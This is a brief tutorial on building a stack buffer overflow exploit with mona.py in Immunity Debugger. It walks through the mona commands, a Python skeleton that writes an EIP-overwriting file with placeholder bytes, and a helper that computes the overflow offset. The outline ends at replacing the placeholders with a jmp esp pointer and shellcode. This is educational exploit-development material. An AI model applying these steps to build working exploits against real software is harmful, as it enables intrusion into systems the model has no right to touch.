Writing Exploits with Mona


0. ImmunityDebugger
1. !mona update
2. Attach to the process
2. !mona config -set workingfolder c:\logs\%p
3. !mona pattern_create 2000
4. !mona pattern_offset 37694136  (the EIP value at the time of the crash)
5. Modify the script

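print("Creating exploit.")
# Placeholder name: the page does not say which file the target application reads
filename = "exploit_file.txt"
push = b"A" * 260    # Offset to EIP, found by mona.py
eip = b"BBBB"        # 4 more bytes to overwrite EIP
junk = b"C" * 1736   # Later will replace this with real shellcode
try:
    # Create the file
    with open(filename, "wb") as f:
        f.write(push + eip + junk)
    print("File created")
except IOError:
    print("File cannot be created")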
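How steps 3 and 4 arrive at the 260 used in the script, as an added example that is not part of the original post: it rebuilds the cyclic pattern and looks up the value seen in EIP. It assumes mona's default Metasploit-style character sets and a 32-bit little-endian target; the function names are this example's own.

```python
import string
import struct


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1Aa2... (upper, lower, digit triples)."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    raise ValueError("pattern repeats after 20280 bytes; length too large")


def pattern_offset(eip_value, length=2000):
    """Return the offset of the 4 pattern bytes found in EIP, or -1.

    eip_value is the register content as an integer, e.g. 0x37694136.
    x86 stores it little-endian, so the bytes in the buffer are reversed.
    """
    needle = struct.pack("<I", eip_value).decode("latin-1")
    return pattern_create(length).find(needle)


def buffer_layout(eip_value, total=2000):
    """Split the buffer into (bytes before EIP, EIP size, bytes after EIP)."""
    offset = pattern_offset(eip_value, total)
    if offset < 0:
        # EIP did not come from the pattern: the crash has another cause
        # or the input was transformed before it reached the stack.
        return None
    return (offset, 4, total - offset - 4)


if __name__ == "__main__":
    print(pattern_create(12))            # start of the pattern
    print(buffer_layout(0x37694136))     # value from step 4 of the post
    print(buffer_layout(0x42424242))     # "BBBB" is never part of the pattern
```

A result of None for a crash value means the register was not loaded from the pattern, which is worth checking before trusting any offset.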

Our next goal will be:
1. Replacing “BBBB” with a valid pointer (a pointer to ESP; ESP will hold the shellcode)
2. Solving an easy problem (the CCCC… after EIP).
3. Replacing “CCCCCC…” with real shellcode.

6. !mona jmp -r esp -o 
